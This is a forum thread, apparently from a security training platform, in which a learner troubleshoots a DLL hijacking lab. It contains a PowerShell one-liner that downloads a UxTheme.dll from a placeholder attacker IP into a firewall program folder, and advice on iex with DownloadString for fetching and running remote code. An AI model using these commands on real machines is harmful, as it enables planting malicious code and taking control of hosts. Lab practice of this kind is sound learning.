Dll hijacking lab command error


powershell -c iex (New-Object Net.WebClient).DownloadFile(‘http://<attacker_IP>/UxTheme.dll’, ‘C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll’)

thats the command in solutions which I used

Specify the port you used with the Python server in your args.

powershell -c iex (New-Object Net.WebClient).DownloadFile('', 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll')

u mean this, right?

thats how we put the port right?

Did you run Python server on port 4444?

yup, can u pls cross-check the command above

What do you mean cross-check? And which command?

@X0RW3LL this one…thats the way to do it I guess

Yes, but it’s not going to be port 4444 with Python server; it’s gonna be something like 80, 8000, or 8080.

oh ya sry…I will have to reset the lab and do this all over again…

I got the same error however I decided to check if it was uploaded and its therevvvvvdvsv

can this error be ignored?

first, try not to post pictures of code but actual code

second: you are trying to use parameter ‘-c’ but the shell can not parse your input - why?
Because the shell expects basically a string as parameter

So what the shell now does is: Execute the command you provided and take the output as String argument to parameter ‘-c’ - and guess what: DownloadFile returns “” =)

see post below

Well I just followed what was given in the solutions

If that was right, you just proved the solution wrong - that happens :smiley:

wait, i was wrong - didnt recognize that you ran from cmd

the problem here is within that iex()
the iex is executed, but with an empty string (the result of download file)

You have to decide: downloadfile or execute(downloadstring)

Well I directly downloaded the file from the browser by doing simpleHTTPServer in kali and I still couldn’t get a session…some issue with the lab

I do not even get what you are trying to accomplish.
The snippet is for downloading a file named dll.
What do you expect that happens?

Both won’t work, I can’t manage to get the session…

Ohh sry I didn’t go into detail, I was able to download the file however the next step is getting a session on the machine after rebooting it. I am not able to get the session

yeah, by just downloading files I would that assume… You need to provide more information
Esp. what did you execute - what is UxTheme.dll, how was it created…

im just fishing here… what are the command you executed - server and client side

I would have provided u with more info but tbh I just replicated what was given in the solutions and it didn’t work, I have asked some of my friends as well, they couldn’t get a session either so I am assuming that something is broken. If u have free time I suggest u to try this lab, thx for ur help …
Btw I guess u tried helping me with the blind pentest lab as well, we both couldn’t get a session there, did u try any other alternative…